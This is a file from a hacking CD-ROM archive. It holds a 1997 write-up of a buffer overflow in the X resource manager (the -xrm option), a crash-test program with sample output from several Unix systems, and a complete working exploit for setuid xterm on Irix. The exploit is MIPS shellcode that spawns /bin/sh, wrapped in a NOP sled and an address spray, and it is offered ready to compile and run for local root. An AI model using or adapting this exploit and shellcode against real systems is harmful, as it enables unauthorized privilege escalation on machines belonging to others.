home *** CD-ROM | disk | FTP | other *** search
/ Power Hacker 2003 / Power_Hacker_2003.iso / Exploit and vulnerability / hoobie / irix-xterm.c < prev    next >
Encoding:
C/C++ Source or Header  |  2001-11-06  |  5.9 KB  |  190 lines
  1.  
  2. This (and the printer and iwsh) exploit have actually highlighted a
  3. serious problem in the resource manager routines in the X libraries on
  4. all platforms I have access to, and I need time to assess the full
  5. impact of this. From first impressions, it looks like pretty much every
  6. suid program linked against the X libraries which uses the X resource
  7. manager routines is vulnerable to buffer overflow exploits even if the
  8. programs themselves are secure. e.g. I have successfully buffer
  9. overflowed xlockmore-4.02 on FreeBSD, which has been specifically
  10. patched against this problem.
  11.  
  12. To test the extent of this, compile the following program and run it
  13. with various X suid programs as parameters. If you get a segmentation
  14. fault or bus error, then you are potentially vulnerable.
  15.  
  16. ----------------------- testx.c ---------------------
  17.  
  18. #include <stdio.h>
  19. #include <stdlib.h>
  20. #include <string.h>
  21. #include <unistd.h>
  22.  
  23. void main(int argc, char **argv)
  24. {
  25.     char *env[] = {0};
  26.     char buffer[18000];    /* Irix has a 20k limit for environment+args */
  27.     if (argc < 2)
  28.       exit(1);
  29.  
  30.     memset(buffer,'a',sizeof buffer);
  31.     buffer[sizeof buffer-1] = '\0';
  32.  
  33.     execle(argv[1], argv[1], "-xrm", buffer, 0, env);
  34.     perror("exec failed");
  35. }
  36.  
  37. ---------------------- end testx.c ----------------------
  38.  
  39. And here we have it in action on Irix:
  40.  
  41. warlock:~/warlock/src/tmp ->./testx /usr/bin/X11/xterm
  42. zsh: bus error  ./testx /usr/bin/X11/xterm
  43. warlock:~/warlock/src/tmp ->./testx /usr/bin/X11/cdplayer
  44. zsh: bus error  ./testx /usr/bin/X11/cdplayer
  45. warlock:~/warlock/src/tmp ->./testx /usr/bin/X11/xconsole
  46. zsh: bus error  ./testx /usr/bin/X11/xconsole
  47. warlock:~/warlock/src/tmp ->./testx /usr/bin/X11/xlock
  48. Xlib: connection to ":0.0" refused by server
  49. Xlib: Client is not authorized to connect to Server
  50. xlock: unable to open display :0.
  51. warlock:~/warlock/src/tmp ->
  52.  
  53. here we can see that xlock is not vulnerable to this attack, but the
  54. others potentially are.
  55.  
  56. On solaris:
  57.  
  58. maxx:~/tmp ->./testx /usr/dt/bin/dtprintinfo
  59. zsh: bus error  ./testx /usr/dt/bin/dtprintinfo
  60. maxx:~/tmp ->./testx /usr/dt/bin/dtaction
  61. zsh: bus error  ./testx /usr/dt/bin/dtaction
  62.  
  63. On XFree86 (tested on FreeBSD 2.2.2):
  64.  
  65. inferno:~/tmp ->./testx /usr/X11R6/bin/xlock
  66. zsh: segmentation fault  ./testx /usr/X11R6/bin/xlock
  67. inferno:~/tmp ->./testx /usr/X11R6/bin/color_xterm
  68. zsh: segmentation fault  ./testx /usr/X11R6/bin/color_xterm
  69. inferno:~/tmp ->./testx /usr/X11R6/bin/xterm
  70. zsh: segmentation fault  ./testx /usr/X11R6/bin/xterm
  71.  
  72. ---------------------------------------------------------------------------
  73. /* /usr/bin/X11/xterm.c exploit by DCRH 27/5/97
  74.  *
  75.  * Tested on: R3000 Indigo (Irix 5.3)
  76.  *            R4400 Indy   (Irix 5.3)
  77.  *            R8000 PChallenge (Irix64 6.2)
  78.  *            R5000 O2 (Irix 6.3)
  79.  *
  80.  * compile as: cc xterm.c (Irix 5.3)
  81.  *             cc -n32 xterm.c (Irix 6.x)
  82.  *
  83.  * Pass '8' as a parameter for Irix 6.x, or change the OFFSET setting below
  84.  *
  85.  */
  86.  
  87. #include <stdio.h>
  88. #include <stdlib.h>
  89. #include <string.h>
  90. #include <sys/types.h>
  91. #include <unistd.h>
  92.  
  93. #define NUM_ADDRESSES   500
  94. #define BUF_LENGTH      500
  95. #define EXTRA           9000
  96. #define OFFSET          0x170         /* 0x178 for Irix 6.x */
  97. #define GP_OFFSET       -0x80
  98. #define IRIX_NOP        0x03e0f825    /* move $ra,$ra */
  99.  
  100. #define u_long unsigned
  101.  
  102. u_long get_sp_code[] = {
  103.     0x03a01025,         /* move $v0,$sp         */
  104.     0x03e00008,         /* jr $ra               */
  105.     0x00000000,         /* nop                  */
  106. };
  107.  
  108. u_long irix_shellcode[] = {
  109.     0x24041234,         /* li $4,0x1234         */
  110.     0x2084edcc,         /* sub $4,0x1234        */
  111.     0x0491fffe,         /* bgezal $4,pc-4       */
  112.     0x03bd302a,         /* sgt $6,$sp,$sp       */
  113.     0x03bd202a,         /* sgt $4,$sp,$sp       */
  114.     0x240203ff,         /* li $v0,1023          */
  115.     0x03ffffcc,         /* syscall 0xfffff      */
  116.     0x23e40138,         /* addi $4,$31,264+48   */
  117.     0xa086feff,         /* sb $6,-264+7($4)     */
  118.     0x2084fef8,         /* sub $4,264           */
  119.     0x20850110,         /* addi $5,$4,264+8     */
  120.     0xaca4fef8,         /* sw $4,-264($5)       */
  121.     0xaca6fefc,         /* sw $4,-260($5)       */
  122.     0x20a5fef8,         /* sub $5, 264          */
  123.     0x240203f3,         /* li $v0,1011          */
  124.     0x03ffffcc,         /* syscall 0xfffff      */
  125.     0x2f62696e,         /* "/bin"               */
  126.     0x2f7368ff,         /* "/sh"                */
  127. };
  128.  
  129. char buf[NUM_ADDRESSES+BUF_LENGTH + EXTRA + 8];
  130.  
  131. void main(int argc, char **argv)
  132. {
  133.     char *env[] = {NULL};
  134.     u_long targ_addr, stack, tmp;
  135.     u_long *long_p;
  136.     int i, code_length = strlen((char *)irix_shellcode)+1;
  137.     u_long (*get_sp)(void) = (u_long (*)(void))get_sp_code;
  138.  
  139.     stack = get_sp();
  140.  
  141.     if (stack & 0x80000000) {
  142.         printf("Recompile with the '-32' option\n");
  143.         exit(1);
  144.     }
  145.  
  146.     long_p =(u_long *)  buf;
  147.     targ_addr = stack + OFFSET;
  148.  
  149.     if (argc > 1)
  150.         targ_addr += atoi(argv[1]);
  151.  
  152.     if (targ_addr + GP_OFFSET > 0x80000000) {
  153.         printf("Sorry - this exploit for Irix 6.x only\n");
  154.         exit(1);
  155.     }
  156.  
  157.     tmp = (targ_addr + NUM_ADDRESSES + (BUF_LENGTH-code_length)/2) & ~3;
  158.  
  159.     while ((tmp & 0xff000000) == 0 ||
  160.            (tmp & 0x00ff0000) == 0 ||
  161.            (tmp & 0x0000ff00) == 0 ||
  162.            (tmp & 0x000000ff) == 0)
  163.         tmp += 4;
  164.  
  165.     for (i = 0; i < NUM_ADDRESSES/(4*sizeof(u_long)); i++) {
  166.         *long_p++ = targ_addr;
  167.         *long_p++ = targ_addr;
  168.         *long_p++ = tmp;
  169.         *long_p++ = tmp;
  170.     }
  171.  
  172.     for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
  173.         *long_p++ = IRIX_NOP;
  174.  
  175.     for (i = 0; i < code_length/sizeof(u_long); i++)
  176.         *long_p++ = irix_shellcode[i];
  177.  
  178.     tmp = (targ_addr + GP_OFFSET + NUM_ADDRESSES/2) & ~3;
  179.  
  180.     for (i = 0; i < EXTRA / sizeof(u_long); i++)
  181.         *long_p++ = (tmp >> 8) | (tmp << 24);
  182.  
  183.     *long_p = 0;
  184.  
  185.     printf("stack = 0x%x, targ_addr = 0x%x\n", stack, targ_addr);
  186.  
  187.     execle("/usr/bin/X11/xterm", "xterm", "-xrm", &buf[3], 0, env);
  188.     perror("execl failed");
  189. }
  190.